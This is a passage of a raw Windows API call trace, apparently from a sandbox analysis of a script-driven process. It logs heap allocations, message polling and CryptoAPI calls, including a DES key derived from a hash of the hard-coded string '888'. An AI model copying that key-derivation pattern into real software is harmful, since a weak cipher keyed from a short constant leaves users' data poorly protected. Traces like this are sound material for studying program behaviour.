hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0247.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0247.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0247.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0247.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0247.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0247.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0247.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0247.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.430] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0247.430] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0247.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54dd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0247.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.430] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.431] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0247.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.431] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0247.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e517c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0247.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.431] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0247.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0247.431] CryptHashData (hHash=0xa87550, pbData=0x2e54e08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0247.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0247.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0247.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0247.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0247.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.434] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.434] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0247.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.435] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0247.435] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0247.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0247.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0247.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0247.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0247.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0247.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51a48 [0247.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51a48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0247.436] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87550, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa873d0) returned 1 [0247.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0247.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0247.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0247.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0247.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0247.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0247.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0247.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0247.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0247.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.438] HeapFree (in: hHeap=0x970000, 